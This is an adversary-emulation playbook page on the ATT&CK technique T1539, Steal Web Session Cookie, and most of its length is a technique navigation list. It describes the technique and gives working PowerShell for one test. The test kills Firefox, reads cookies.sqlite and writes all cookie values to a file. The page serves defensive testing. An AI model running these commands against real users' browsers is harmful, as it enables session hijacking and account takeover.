Skip to main content
Ctrl+K
The Atomic Playbook - Home
  • Welcome to the Atomic Playbook
  • Initial Access
    • T1078.001 - Default Accounts
    • T1078.002 - Domain Accounts
    • T1078.003 - Local Accounts
    • T1078.004 - Cloud Accounts
    • T1078 - Valid Accounts
    • T1091 - Replication Through Removable Media
    • T1133 - External Remote Services
    • T1189 - Drive-by Compromise
    • T1190 - Exploit Public-Facing Application
    • T1195.001 - Compromise Software Dependencies and Development Tools
    • T1195.002 - Compromise Software Supply Chain
    • T1195.003 - Compromise Hardware Supply Chain
    • T1195 - Supply Chain Compromise
    • T1199 - Trusted Relationship
    • T1200 - Hardware Additions
    • T1566.001 - Spearphishing Attachment
    • T1566.002 - Spearphishing Link
    • T1566.003 - Spearphishing via Service
    • T1566.004 - Spearphishing Voice
    • T1566 - Phishing
    • T1659 - Content Injection
  • Execution
    • T1047 - Windows Management Instrumentation
    • T1053.002 - At
    • T1053.003 - Cron
    • T1053.005 - Scheduled Task
    • T1053.006 - Systemd Timers
    • T1053.007 - Container Orchestration Job
    • T1053 - Scheduled Task/Job
    • T1059.001 - PowerShell
    • T1059.002 - AppleScript
    • T1059.003 - Windows Command Shell
    • T1059.004 - Unix Shell
    • T1059.005 - Visual Basic
    • T1059.006 - Python
    • T1059.007 - JavaScript
    • T1059.008 - Network Device CLI
    • T1059.009 - Cloud API
    • T1059 - Command and Scripting Interpreter
    • T1072 - Software Deployment Tools
    • T1106 - Native API
    • T1129 - Shared Modules
    • T1203 - Exploitation for Client Execution
    • T1204.001 - Malicious Link
    • T1204.002 - Malicious File
    • T1204.003 - Malicious Image
    • T1204 - User Execution
    • T1559.001 - Component Object Model
    • T1559.002 - Dynamic Data Exchange
    • T1559.003 - XPC Services
    • T1559 - Inter-Process Communication
    • T1569.001 - Launchctl
    • T1569.002 - Service Execution
    • T1569 - System Services
    • T1609 - Container Administration Command
    • T1610 - Deploy Container
    • T1648 - Serverless Execution
    • T1651 - Cloud Administration Command
  • Persistence
    • T1037.001 - Logon Script (Windows)
    • T1037.002 - Login Hook
    • T1037.003 - Network Logon Script
    • T1037.004 - RC Scripts
    • T1037.005 - Startup Items
    • T1037 - Boot or Logon Initialization Scripts
    • T1053.002 - At
    • T1053.003 - Cron
    • T1053.005 - Scheduled Task
    • T1053.006 - Systemd Timers
    • T1053.007 - Container Orchestration Job
    • T1053 - Scheduled Task/Job
    • T1078.001 - Default Accounts
    • T1078.002 - Domain Accounts
    • T1078.003 - Local Accounts
    • T1078.004 - Cloud Accounts
    • T1078 - Valid Accounts
    • T1098.001 - Additional Cloud Credentials
    • T1098.002 - Additional Email Delegate Permissions
    • T1098.003 - Additional Cloud Roles
    • T1098.004 - SSH Authorized Keys
    • T1098.005 - Device Registration
    • T1098.006 - Additional Container Cluster Roles
    • T1098 - Account Manipulation
    • T1133 - External Remote Services
    • T1136.001 - Local Account
    • T1136.002 - Domain Account
    • T1136.003 - Cloud Account
    • T1136 - Create Account
    • T1137.001 - Office Template Macros
    • T1137.002 - Office Test
    • T1137.003 - Outlook Forms
    • T1137.004 - Outlook Home Page
    • T1137.005 - Outlook Rules
    • T1137.006 - Add-ins
    • T1137 - Office Application Startup
    • T1176 - Browser Extensions
    • T1197 - BITS Jobs
    • T1205.001 - Port Knocking
    • T1205.002 - Socket Filters
    • T1205 - Traffic Signaling
    • T1505.001 - SQL Stored Procedures
    • T1505.002 - Transport Agent
    • T1505.003 - Web Shell
    • T1505.004 - IIS Components
    • T1505.005 - Terminal Services DLL
    • T1505 - Server Software Component
    • T1525 - Implant Internal Image
    • T1542.001 - System Firmware
    • T1542.002 - Component Firmware
    • T1542.003 - Bootkit
    • T1542.004 - ROMMONkit
    • T1542.005 - TFTP Boot
    • T1542 - Pre-OS Boot
    • T1543.001 - Launch Agent
    • T1543.002 - Systemd Service
    • T1543.003 - Windows Service
    • T1543.004 - Launch Daemon
    • T1543 - Create or Modify System Process
    • T1546.001 - Change Default File Association
    • T1546.002 - Screensaver
    • T1546.003 - Windows Management Instrumentation Event Subscription
    • T1546.004 - Unix Shell Configuration Modification
    • T1546.005 - Trap
    • T1546.006 - LC_LOAD_DYLIB Addition
    • T1546.007 - Netsh Helper DLL
    • T1546.008 - Accessibility Features
    • T1546.009 - AppCert DLLs
    • T1546.010 - AppInit DLLs
    • T1546.011 - Application Shimming
    • T1546.012 - Image File Execution Options Injection
    • T1546.013 - PowerShell Profile
    • T1546.014 - Emond
    • T1546.015 - Component Object Model Hijacking
    • T1546.016 - Installer Packages
    • T1546 - Event Triggered Execution
    • T1547.001 - Registry Run Keys / Startup Folder
    • T1547.002 - Authentication Package
    • T1547.003 - Time Providers
    • T1547.004 - Winlogon Helper DLL
    • T1547.005 - Security Support Provider
    • T1547.006 - Kernel Modules and Extensions
    • T1547.007 - Re-opened Applications
    • T1547.008 - LSASS Driver
    • T1547.009 - Shortcut Modification
    • T1547.010 - Port Monitors
    • T1547.012 - Print Processors
    • T1547.013 - XDG Autostart Entries
    • T1547.014 - Active Setup
    • T1547.015 - Login Items
    • T1547 - Boot or Logon Autostart Execution
    • T1554 - Compromise Client Software Binary
    • T1556.001 - Domain Controller Authentication
    • T1556.002 - Password Filter DLL
    • T1556.003 - Pluggable Authentication Modules
    • T1556.004 - Network Device Authentication
    • T1556.005 - Reversible Encryption
    • T1556.006 - Multi-Factor Authentication
    • T1556.007 - Hybrid Identity
    • T1556.008 - Network Provider DLL
    • T1556 - Modify Authentication Process
    • T1574.001 - DLL Search Order Hijacking
    • T1574.002 - DLL Side-Loading
    • T1574.004 - Dylib Hijacking
    • T1574.005 - Executable Installer File Permissions Weakness
    • T1574.006 - Dynamic Linker Hijacking
    • T1574.007 - Path Interception by PATH Environment Variable
    • T1574.008 - Path Interception by Search Order Hijacking
    • T1574.009 - Path Interception by Unquoted Path
    • T1574.010 - Services File Permissions Weakness
    • T1574.011 - Services Registry Permissions Weakness
    • T1574.012 - COR_PROFILER
    • T1574.013 - KernelCallbackTable
    • T1574 - Hijack Execution Flow
    • T1653 - Power Settings
  • Privilege Escalation
    • T1037.001 - Logon Script (Windows)
    • T1037.002 - Login Hook
    • T1037.003 - Network Logon Script
    • T1037.004 - RC Scripts
    • T1037.005 - Startup Items
    • T1037 - Boot or Logon Initialization Scripts
    • T1053.002 - At
    • T1053.003 - Cron
    • T1053.005 - Scheduled Task
    • T1053.006 - Systemd Timers
    • T1053.007 - Container Orchestration Job
    • T1053 - Scheduled Task/Job
    • T1055.001 - Dynamic-link Library Injection
    • T1055.002 - Portable Executable Injection
    • T1055.003 - Thread Execution Hijacking
    • T1055.004 - Asynchronous Procedure Call
    • T1055.005 - Thread Local Storage
    • T1055.008 - Ptrace System Calls
    • T1055.009 - Proc Memory
    • T1055.011 - Extra Window Memory Injection
    • T1055.012 - Process Hollowing
    • T1055.013 - Process Doppelgänging
    • T1055.014 - VDSO Hijacking
    • T1055.015 - ListPlanting
    • T1055 - Process Injection
    • T1068 - Exploitation for Privilege Escalation
    • T1078.001 - Default Accounts
    • T1078.002 - Domain Accounts
    • T1078.003 - Local Accounts
    • T1078.004 - Cloud Accounts
    • T1078 - Valid Accounts
    • T1098.001 - Additional Cloud Credentials
    • T1098.002 - Additional Email Delegate Permissions
    • T1098.003 - Additional Cloud Roles
    • T1098.004 - SSH Authorized Keys
    • T1098.005 - Device Registration
    • T1098.006 - Additional Container Cluster Roles
    • T1098 - Account Manipulation
    • T1134.001 - Token Impersonation/Theft
    • T1134.002 - Create Process with Token
    • T1134.003 - Make and Impersonate Token
    • T1134.004 - Parent PID Spoofing
    • T1134.005 - SID-History Injection
    • T1134 - Access Token Manipulation
    • T1484.001 - Group Policy Modification
    • T1484.002 - Domain Trust Modification
    • T1484 - Domain Policy Modification
    • T1543.001 - Launch Agent
    • T1543.002 - Systemd Service
    • T1543.003 - Windows Service
    • T1543.004 - Launch Daemon
    • T1543 - Create or Modify System Process
    • T1546.001 - Change Default File Association
    • T1546.002 - Screensaver
    • T1546.003 - Windows Management Instrumentation Event Subscription
    • T1546.004 - Unix Shell Configuration Modification
    • T1546.005 - Trap
    • T1546.006 - LC_LOAD_DYLIB Addition
    • T1546.007 - Netsh Helper DLL
    • T1546.008 - Accessibility Features
    • T1546.009 - AppCert DLLs
    • T1546.010 - AppInit DLLs
    • T1546.011 - Application Shimming
    • T1546.012 - Image File Execution Options Injection
    • T1546.013 - PowerShell Profile
    • T1546.014 - Emond
    • T1546.015 - Component Object Model Hijacking
    • T1546.016 - Installer Packages
    • T1546 - Event Triggered Execution
    • T1547.001 - Registry Run Keys / Startup Folder
    • T1547.002 - Authentication Package
    • T1547.003 - Time Providers
    • T1547.004 - Winlogon Helper DLL
    • T1547.005 - Security Support Provider
    • T1547.006 - Kernel Modules and Extensions
    • T1547.007 - Re-opened Applications
    • T1547.008 - LSASS Driver
    • T1547.009 - Shortcut Modification
    • T1547.010 - Port Monitors
    • T1547.012 - Print Processors
    • T1547.013 - XDG Autostart Entries
    • T1547.014 - Active Setup
    • T1547.015 - Login Items
    • T1547 - Boot or Logon Autostart Execution
    • T1548.001 - Setuid and Setgid
    • T1548.002 - Bypass User Account Control
    • T1548.003 - Sudo and Sudo Caching
    • T1548.004 - Elevated Execution with Prompt
    • T1548.005 - Temporary Elevated Cloud Access
    • T1548 - Abuse Elevation Control Mechanism
    • T1574.001 - DLL Search Order Hijacking
    • T1574.002 - DLL Side-Loading
    • T1574.004 - Dylib Hijacking
    • T1574.005 - Executable Installer File Permissions Weakness
    • T1574.006 - Dynamic Linker Hijacking
    • T1574.007 - Path Interception by PATH Environment Variable
    • T1574.008 - Path Interception by Search Order Hijacking
    • T1574.009 - Path Interception by Unquoted Path
    • T1574.010 - Services File Permissions Weakness
    • T1574.011 - Services Registry Permissions Weakness
    • T1574.012 - COR_PROFILER
    • T1574.013 - KernelCallbackTable
    • T1574 - Hijack Execution Flow
    • T1611 - Escape to Host
  • Defense Evasion
    • T1006 - Direct Volume Access
    • T1014 - Rootkit
    • T1027.001 - Binary Padding
    • T1027.002 - Software Packing
    • T1027.003 - Steganography
    • T1027.004 - Compile After Delivery
    • T1027.005 - Indicator Removal from Tools
    • T1027.006 - HTML Smuggling
    • T1027.007 - Dynamic API Resolution
    • T1027.008 - Stripped Payloads
    • T1027.009 - Embedded Payloads
    • T1027.010 - Command Obfuscation
    • T1027.011 - Fileless Storage
    • T1027.012 - LNK Icon Smuggling
    • T1027 - Obfuscated Files or Information
    • T1036.001 - Invalid Code Signature
    • T1036.002 - Right-to-Left Override
    • T1036.003 - Rename System Utilities
    • T1036.004 - Masquerade Task or Service
    • T1036.005 - Match Legitimate Name or Location
    • T1036.006 - Space after Filename
    • T1036.007 - Double File Extension
    • T1036.008 - Masquerade File Type
    • T1036.009 - Break Process Trees
    • T1036 - Masquerading
    • T1055.001 - Dynamic-link Library Injection
    • T1055.002 - Portable Executable Injection
    • T1055.003 - Thread Execution Hijacking
    • T1055.004 - Asynchronous Procedure Call
    • T1055.005 - Thread Local Storage
    • T1055.008 - Ptrace System Calls
    • T1055.009 - Proc Memory
    • T1055.011 - Extra Window Memory Injection
    • T1055.012 - Process Hollowing
    • T1055.013 - Process Doppelgänging
    • T1055.014 - VDSO Hijacking
    • T1055.015 - ListPlanting
    • T1055 - Process Injection
    • T1070.001 - Clear Windows Event Logs
    • T1070.002 - Clear Linux or Mac System Logs
    • T1070.003 - Clear Command History
    • T1070.004 - File Deletion
    • T1070.005 - Network Share Connection Removal
    • T1070.006 - Timestomp
    • T1070.007 - Clear Network Connection History and Configurations
    • T1070.008 - Clear Mailbox Data
    • T1070.009 - Clear Persistence
    • T1070 - Indicator Removal
    • T1078.001 - Default Accounts
    • T1078.002 - Domain Accounts
    • T1078.003 - Local Accounts
    • T1078.004 - Cloud Accounts
    • T1078 - Valid Accounts
    • T1112 - Modify Registry
    • T1127.001 - MSBuild
    • T1127 - Trusted Developer Utilities Proxy Execution
    • T1134.001 - Token Impersonation/Theft
    • T1134.002 - Create Process with Token
    • T1134.003 - Make and Impersonate Token
    • T1134.004 - Parent PID Spoofing
    • T1134.005 - SID-History Injection
    • T1134 - Access Token Manipulation
    • T1140 - Deobfuscate/Decode Files or Information
    • T1197 - BITS Jobs
    • T1202 - Indirect Command Execution
    • T1205.001 - Port Knocking
    • T1205.002 - Socket Filters
    • T1205 - Traffic Signaling
    • T1207 - Rogue Domain Controller
    • T1211 - Exploitation for Defense Evasion
    • T1216.001 - PubPrn
    • T1216 - System Script Proxy Execution
    • T1218.001 - Compiled HTML File
    • T1218.002 - Control Panel
    • T1218.003 - CMSTP
    • T1218.004 - InstallUtil
    • T1218.005 - Mshta
    • T1218.007 - Msiexec
    • T1218.008 - Odbcconf
    • T1218.009 - Regsvcs/Regasm
    • T1218.010 - Regsvr32
    • T1218.011 - Rundll32
    • T1218.012 - Verclsid
    • T1218.013 - Mavinject
    • T1218.014 - MMC
    • T1218 - System Binary Proxy Execution
    • T1220 - XSL Script Processing
    • T1221 - Template Injection
    • T1222.001 - Windows File and Directory Permissions Modification
    • T1222.002 - Linux and Mac File and Directory Permissions Modification
    • T1222 - File and Directory Permissions Modification
    • T1480.001 - Environmental Keying
    • T1480 - Execution Guardrails
    • T1484.001 - Group Policy Modification
    • T1484.002 - Domain Trust Modification
    • T1484 - Domain Policy Modification
    • T1497.001 - System Checks
    • T1497.002 - User Activity Based Checks
    • T1497.003 - Time Based Evasion
    • T1497 - Virtualization/Sandbox Evasion
    • T1535 - Unused/Unsupported Cloud Regions
    • T1542.001 - System Firmware
    • T1542.002 - Component Firmware
    • T1542.003 - Bootkit
    • T1542.004 - ROMMONkit
    • T1542.005 - TFTP Boot
    • T1542 - Pre-OS Boot
    • T1548.001 - Setuid and Setgid
    • T1548.002 - Bypass User Account Control
    • T1548.003 - Sudo and Sudo Caching
    • T1548.004 - Elevated Execution with Prompt
    • T1548.005 - Temporary Elevated Cloud Access
    • T1548 - Abuse Elevation Control Mechanism
    • T1550.001 - Application Access Token
    • T1550.002 - Pass the Hash
    • T1550.003 - Pass the Ticket
    • T1550.004 - Web Session Cookie
    • T1550 - Use Alternate Authentication Material
    • T1553.001 - Gatekeeper Bypass
    • T1553.002 - Code Signing
    • T1553.003 - SIP and Trust Provider Hijacking
    • T1553.004 - Install Root Certificate
    • T1553.005 - Mark-of-the-Web Bypass
    • T1553.006 - Code Signing Policy Modification
    • T1553 - Subvert Trust Controls
    • T1556.001 - Domain Controller Authentication
    • T1556.002 - Password Filter DLL
    • T1556.003 - Pluggable Authentication Modules
    • T1556.004 - Network Device Authentication
    • T1556.005 - Reversible Encryption
    • T1556.006 - Multi-Factor Authentication
    • T1556.007 - Hybrid Identity
    • T1556.008 - Network Provider DLL
    • T1556 - Modify Authentication Process
    • T1562.001 - Disable or Modify Tools
    • T1562.002 - Disable Windows Event Logging
    • T1562.003 - Impair Command History Logging
    • T1562.004 - Disable or Modify System Firewall
    • T1562.006 - Indicator Blocking
    • T1562.007 - Disable or Modify Cloud Firewall
    • T1562.008 - Disable or Modify Cloud Logs
    • T1562.009 - Safe Mode Boot
    • T1562.010 - Downgrade Attack
    • T1562.011 - Spoof Security Alerting
    • T1562.012 - Disable or Modify Linux Audit System
    • T1562 - Impair Defenses
    • T1564.001 - Hidden Files and Directories
    • T1564.002 - Hidden Users
    • T1564.003 - Hidden Window
    • T1564.004 - NTFS File Attributes
    • T1564.005 - Hidden File System
    • T1564.006 - Run Virtual Instance
    • T1564.007 - VBA Stomping
    • T1564.008 - Email Hiding Rules
    • T1564.009 - Resource Forking
    • T1564.010 - Process Argument Spoofing
    • T1564.011 - Ignore Process Interrupts
    • T1564 - Hide Artifacts
    • T1574.001 - DLL Search Order Hijacking
    • T1574.002 - DLL Side-Loading
    • T1574.004 - Dylib Hijacking
    • T1574.005 - Executable Installer File Permissions Weakness
    • T1574.006 - Dynamic Linker Hijacking
    • T1574.007 - Path Interception by PATH Environment Variable
    • T1574.008 - Path Interception by Search Order Hijacking
    • T1574.009 - Path Interception by Unquoted Path
    • T1574.010 - Services File Permissions Weakness
    • T1574.011 - Services Registry Permissions Weakness
    • T1574.012 - COR_PROFILER
    • T1574.013 - KernelCallbackTable
    • T1574 - Hijack Execution Flow
    • T1578.001 - Create Snapshot
    • T1578.002 - Create Cloud Instance
    • T1578.003 - Delete Cloud Instance
    • T1578.004 - Revert Cloud Instance
    • T1578.005 - Modify Cloud Compute Configurations
    • T1578 - Modify Cloud Compute Infrastructure
    • T1599.001 - Network Address Translation Traversal
    • T1599 - Network Boundary Bridging
    • T1600.001 - Reduce Key Space
    • T1600.002 - Disable Crypto Hardware
    • T1600 - Weaken Encryption
    • T1601.001 - Patch System Image
    • T1601.002 - Downgrade System Image
    • T1601 - Modify System Image
    • T1610 - Deploy Container
    • T1612 - Build Image on Host
    • T1620 - Reflective Code Loading
    • T1622 - Debugger Evasion
    • T1647 - Plist File Modification
    • T1656 - Impersonation
  • Credential Access
    • T1003.001 - LSASS Memory
    • T1003.002 - Security Account Manager
    • T1003.003 - NTDS
    • T1003.004 - LSA Secrets
    • T1003.005 - Cached Domain Credentials
    • T1003.006 - DCSync
    • T1003.007 - Proc Filesystem
    • T1003.008 - /etc/passwd and /etc/shadow
    • T1003 - OS Credential Dumping
    • T1040 - Network Sniffing
    • T1056.001 - Keylogging
    • T1056.002 - GUI Input Capture
    • T1056.003 - Web Portal Capture
    • T1056.004 - Credential API Hooking
    • T1056 - Input Capture
    • T1110.001 - Password Guessing
    • T1110.002 - Password Cracking
    • T1110.003 - Password Spraying
    • T1110.004 - Credential Stuffing
    • T1110 - Brute Force
    • T1111 - Multi-Factor Authentication Interception
    • T1187 - Forced Authentication
    • T1212 - Exploitation for Credential Access
    • T1528 - Steal Application Access Token
    • T1539 - Steal Web Session Cookie
    • T1552.001 - Credentials In Files
    • T1552.002 - Credentials in Registry
    • T1552.003 - Bash History
    • T1552.004 - Private Keys
    • T1552.005 - Cloud Instance Metadata API
    • T1552.006 - Group Policy Preferences
    • T1552.007 - Container API
    • T1552.008 - Chat Messages
    • T1552 - Unsecured Credentials
    • T1555.001 - Keychain
    • T1555.002 - Securityd Memory
    • T1555.003 - Credentials from Web Browsers
    • T1555.004 - Windows Credential Manager
    • T1555.005 - Password Managers
    • T1555.006 - Cloud Secrets Management Stores
    • T1555 - Credentials from Password Stores
    • T1556.001 - Domain Controller Authentication
    • T1556.002 - Password Filter DLL
    • T1556.003 - Pluggable Authentication Modules
    • T1556.004 - Network Device Authentication
    • T1556.005 - Reversible Encryption
    • T1556.006 - Multi-Factor Authentication
    • T1556.007 - Hybrid Identity
    • T1556.008 - Network Provider DLL
    • T1556 - Modify Authentication Process
    • T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay
    • T1557.002 - ARP Cache Poisoning
    • T1557.003 - DHCP Spoofing
    • T1557 - Adversary-in-the-Middle
    • T1558.001 - Golden Ticket
    • T1558.002 - Silver Ticket
    • T1558.003 - Kerberoasting
    • T1558.004 - AS-REP Roasting
    • T1558 - Steal or Forge Kerberos Tickets
    • T1606.001 - Web Cookies
    • T1606.002 - SAML Tokens
    • T1606 - Forge Web Credentials
    • T1621 - Multi-Factor Authentication Request Generation
    • T1649 - Steal or Forge Authentication Certificates
  • Discovery
    • T1007 - System Service Discovery
    • T1010 - Application Window Discovery
    • T1012 - Query Registry
    • T1016.001 - Internet Connection Discovery
    • T1016.002 - Wi-Fi Discovery
    • T1016 - System Network Configuration Discovery
    • T1018 - Remote System Discovery
    • T1033 - System Owner/User Discovery
    • T1040 - Network Sniffing
    • T1046 - Network Service Discovery
    • T1049 - System Network Connections Discovery
    • T1057 - Process Discovery
    • T1069.001 - Local Groups
    • T1069.002 - Domain Groups
    • T1069.003 - Cloud Groups
    • T1069 - Permission Groups Discovery
    • T1082 - System Information Discovery
    • T1083 - File and Directory Discovery
    • T1087.001 - Local Account
    • T1087.002 - Domain Account
    • T1087.003 - Email Account
    • T1087.004 - Cloud Account
    • T1087 - Account Discovery
    • T1120 - Peripheral Device Discovery
    • T1124 - System Time Discovery
    • T1135 - Network Share Discovery
    • T1201 - Password Policy Discovery
    • T1217 - Browser Information Discovery
    • T1482 - Domain Trust Discovery
    • T1497.001 - System Checks
    • T1497.002 - User Activity Based Checks
    • T1497.003 - Time Based Evasion
    • T1497 - Virtualization/Sandbox Evasion
    • T1518.001 - Security Software Discovery
    • T1518 - Software Discovery
    • T1526 - Cloud Service Discovery
    • T1538 - Cloud Service Dashboard
    • T1580 - Cloud Infrastructure Discovery
    • T1613 - Container and Resource Discovery
    • T1614.001 - System Language Discovery
    • T1614 - System Location Discovery
    • T1615 - Group Policy Discovery
    • T1619 - Cloud Storage Object Discovery
    • T1622 - Debugger Evasion
    • T1652 - Device Driver Discovery
    • T1654 - Log Enumeration
  • Lateral Movement
    • T1021.001 - Remote Desktop Protocol
    • T1021.002 - SMB/Windows Admin Shares
    • T1021.003 - Distributed Component Object Model
    • T1021.004 - SSH
    • T1021.005 - VNC
    • T1021.006 - Windows Remote Management
    • T1021.007 - Cloud Services
    • T1021.008 - Direct Cloud VM Connections
    • T1021 - Remote Services
    • T1072 - Software Deployment Tools
    • T1080 - Taint Shared Content
    • T1091 - Replication Through Removable Media
    • T1210 - Exploitation of Remote Services
    • T1534 - Internal Spearphishing
    • T1550.001 - Application Access Token
    • T1550.002 - Pass the Hash
    • T1550.003 - Pass the Ticket
    • T1550.004 - Web Session Cookie
    • T1550 - Use Alternate Authentication Material
    • T1563.001 - SSH Hijacking
    • T1563.002 - RDP Hijacking
    • T1563 - Remote Service Session Hijacking
    • T1570 - Lateral Tool Transfer
  • Collection
    • T1005 - Data from Local System
    • T1025 - Data from Removable Media
    • T1039 - Data from Network Shared Drive
    • T1056.001 - Keylogging
    • T1056.002 - GUI Input Capture
    • T1056.003 - Web Portal Capture
    • T1056.004 - Credential API Hooking
    • T1056 - Input Capture
    • T1074.001 - Local Data Staging
    • T1074.002 - Remote Data Staging
    • T1074 - Data Staged
    • T1113 - Screen Capture
    • T1114.001 - Local Email Collection
    • T1114.002 - Remote Email Collection
    • T1114.003 - Email Forwarding Rule
    • T1114 - Email Collection
    • T1115 - Clipboard Data
    • T1119 - Automated Collection
    • T1123 - Audio Capture
    • T1125 - Video Capture
    • T1185 - Browser Session Hijacking
    • T1213.001 - Confluence
    • T1213.002 - Sharepoint
    • T1213.003 - Code Repositories
    • T1213 - Data from Information Repositories
    • T1530 - Data from Cloud Storage
    • T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay
    • T1557.002 - ARP Cache Poisoning
    • T1557.003 - DHCP Spoofing
    • T1557 - Adversary-in-the-Middle
    • T1560.001 - Archive via Utility
    • T1560.002 - Archive via Library
    • T1560.003 - Archive via Custom Method
    • T1560 - Archive Collected Data
    • T1602.001 - SNMP (MIB Dump)
    • T1602.002 - Network Device Configuration Dump
    • T1602 - Data from Configuration Repository
  • Command and Control
    • T1001.001 - Junk Data
    • T1001.002 - Steganography
    • T1001.003 - Protocol Impersonation
    • T1001 - Data Obfuscation
    • T1008 - Fallback Channels
    • T1071.001 - Web Protocols
    • T1071.002 - File Transfer Protocols
    • T1071.003 - Mail Protocols
    • T1071.004 - DNS
    • T1071 - Application Layer Protocol
    • T1090.001 - Internal Proxy
    • T1090.002 - External Proxy
    • T1090.003 - Multi-hop Proxy
    • T1090.004 - Domain Fronting
    • T1090 - Proxy
    • T1092 - Communication Through Removable Media
    • T1095 - Non-Application Layer Protocol
    • T1102.001 - Dead Drop Resolver
    • T1102.002 - Bidirectional Communication
    • T1102.003 - One-Way Communication
    • T1102 - Web Service
    • T1104 - Multi-Stage Channels
    • T1105 - Ingress Tool Transfer
    • T1132.001 - Standard Encoding
    • T1132.002 - Non-Standard Encoding
    • T1132 - Data Encoding
    • T1205.001 - Port Knocking
    • T1205.002 - Socket Filters
    • T1205 - Traffic Signaling
    • T1219 - Remote Access Software
    • T1568.001 - Fast Flux DNS
    • T1568.002 - Domain Generation Algorithms
    • T1568.003 - DNS Calculation
    • T1568 - Dynamic Resolution
    • T1571 - Non-Standard Port
    • T1572 - Protocol Tunneling
    • T1573.001 - Symmetric Cryptography
    • T1573.002 - Asymmetric Cryptography
    • T1573 - Encrypted Channel
    • T1659 - Content Injection
  • Exfiltration
    • T1011.001 - Exfiltration Over Bluetooth
    • T1011 - Exfiltration Over Other Network Medium
    • T1020.001 - Traffic Duplication
    • T1020 - Automated Exfiltration
    • T1029 - Scheduled Transfer
    • T1030 - Data Transfer Size Limits
    • T1041 - Exfiltration Over C2 Channel
    • T1048.001 - Exfiltration Over Symmetric Encrypted Non-C2 Protocol
    • T1048.002 - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
    • T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
    • T1048 - Exfiltration Over Alternative Protocol
    • T1052.001 - Exfiltration over USB
    • T1052 - Exfiltration Over Physical Medium
    • T1537 - Transfer Data to Cloud Account
    • T1567.001 - Exfiltration to Code Repository
    • T1567.002 - Exfiltration to Cloud Storage
    • T1567.003 - Exfiltration to Text Storage Sites
    • T1567.004 - Exfiltration Over Webhook
    • T1567 - Exfiltration Over Web Service
  • Impact
    • T1485 - Data Destruction
    • T1486 - Data Encrypted for Impact
    • T1489 - Service Stop
    • T1490 - Inhibit System Recovery
    • T1491.001 - Internal Defacement
    • T1491.002 - External Defacement
    • T1491 - Defacement
    • T1495 - Firmware Corruption
    • T1496 - Resource Hijacking
    • T1498.001 - Direct Network Flood
    • T1498.002 - Reflection Amplification
    • T1498 - Network Denial of Service
    • T1499.001 - OS Exhaustion Flood
    • T1499.002 - Service Exhaustion Flood
    • T1499.003 - Application Exhaustion Flood
    • T1499.004 - Application or System Exploitation
    • T1499 - Endpoint Denial of Service
    • T1529 - System Shutdown/Reboot
    • T1531 - Account Access Removal
    • T1561.001 - Disk Content Wipe
    • T1561.002 - Disk Structure Wipe
    • T1561 - Disk Wipe
    • T1565.001 - Stored Data Manipulation
    • T1565.002 - Transmitted Data Manipulation
    • T1565.003 - Runtime Data Manipulation
    • T1565 - Data Manipulation
    • T1657 - Financial Theft
  • .ipynb

T1539 - Steal Web Session Cookie

Contents

  • Atomic Tests
    • Atomic Test #1 - Steal Firefox Cookies (Windows)
      • Dependencies: Run with powershell!
        • Description: Sqlite3 must exist at (#{sqlite3_path})
        • Check Prereq Commands:
        • Get Prereq Commands:
      • Attack Commands: Run with powershell
      • Cleanup:
    • Atomic Test #2 - Steal Chrome Cookies (Windows)
      • Dependencies: Run with powershell!
        • Description: Sqlite3 must exist at (#{sqlite3_path})
        • Check Prereq Commands:
        • Get Prereq Commands:
      • Attack Commands: Run with powershell
      • Cleanup:
    • Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)
      • Dependencies: Run with bash!
        • Description: Install Go
        • Check Prereq Commands:
        • Get Prereq Commands:
        • Description: Download and compile WhiteChocolateMacademiaNut
        • Check Prereq Commands:
        • Get Prereq Commands:
      • Attack Commands: Run with bash
      • Cleanup:
  • Detection
  • Shield Active Defense
    • Security Controls
      • Opportunity
      • Use Case
      • Procedures

T1539 - Steal Web Session Cookie#

An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.

Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)

There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx2 and Muraena that can gather session cookies through a malicious proxy (ex: Adversary-in-the-Middle) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)

After an adversary acquires a valid cookie, they can then perform a Web Session Cookie technique to login to the corresponding web application.

Atomic Tests#

Atomic Test #1 - Steal Firefox Cookies (Windows)#

This test queries Firefox’s cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot’s cookie theft function. Note: If Firefox is running, the process will be killed to ensure that the DB file isn’t locked. See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.

Supported Platforms: windows

Elevation Required (e.g. root or admin)

Dependencies: Run with powershell!#

Description: Sqlite3 must exist at (#{sqlite3_path})#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\sqlite.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -force
Invoke-AtomicTest T1539 -TestNumbers 1 -GetPreReqs

Attack Commands: Run with powershell#

stop-process -name "firefox" -force -erroraction silentlycontinue
$CookieDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*\cookies.sqlite"
"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];" | cmd /c PathToAtomicsFolder\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "$CookieDBLocation" | out-file -filepath "PathToAtomicsFolder\..\ExternalPayloads\T1539FirefoxCookies.txt"
Invoke-AtomicTest T1539 -TestNumbers 1

Cleanup:#

